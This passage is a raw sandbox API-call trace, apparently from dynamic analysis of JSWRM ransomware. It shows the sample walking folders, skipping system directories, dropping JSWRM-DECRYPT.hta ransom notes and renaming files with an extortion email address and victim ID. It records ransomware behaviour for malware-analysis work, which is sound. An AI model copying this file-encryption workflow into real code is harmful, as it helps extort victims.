lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.656] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0067.657] CloseHandle (hObject=0x298) returned 1 [0067.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0067.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0067.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0067.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0067.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0067.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\jswrm-decrypt.hta")) returned 0x20 [0067.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0067.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0067.660] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1efc60fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0067.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.660] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1efc60fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0067.661] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.661] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.661] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc137d, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2=".") returned 1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="..") returned 1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="...") returned 1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="windows") returned -1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="recovery") returned -1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="perflogs") returned -1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="documents and settings") returned -1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="$RECYCLE.BIN") returned 1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="system volume information") returned -1 [0067.661] lstrcmpiW (lpString1="Alphabet.xml", lpString2="msocache") returned -1 [0067.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Alphabet.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Alphabet.xml", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Alphabet.xml", lpUsedDefaultChar=0x0) returned 12 [0067.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Alphabet.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Alphabet.xml", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Alphabet.xml", lpUsedDefaultChar=0x0) returned 12 [0067.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0067.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0067.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.663] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659244011999360) returned 0 [0067.663] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0067.663] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.663] CloseHandle (hObject=0xffffffff) returned 1 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0067.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0067.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0067.664] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2=".") returned 1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="..") returned 1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="...") returned 1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="windows") returned -1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="recovery") returned -1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="perflogs") returned -1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="documents and settings") returned -1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="$RECYCLE.BIN") returned 1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="system volume information") returned -1 [0067.664] lstrcmpiW (lpString1="ar-SA", lpString2="msocache") returned -1 [0067.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0067.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0067.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0067.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\jswrm-decrypt.hta")) returned 0xffffffff [0067.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0067.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0067.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.665] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.665] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.666] CloseHandle (hObject=0x454) returned 1 [0067.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\jswrm-decrypt.hta")) returned 0x20 [0067.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.668] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1efec1d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0067.668] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.668] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1efec1d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.669] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.669] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1efec1d1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1efec1d1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1efec1d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.669] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.670] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.670] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.712] 